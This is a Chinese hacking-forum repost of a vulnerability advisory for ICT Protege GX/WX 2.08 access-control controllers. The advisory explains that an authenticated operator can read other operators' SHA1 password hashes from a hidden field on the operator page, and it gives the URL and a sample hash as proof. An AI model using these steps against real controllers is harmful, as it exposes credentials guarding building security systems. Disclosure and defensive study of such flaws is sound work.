跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.

Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.

Tested on: Microsoft-WinCE/6.00


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php


08.02.2022

--


Navigate to http://CONTROLLER_IP/operator.htm

Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。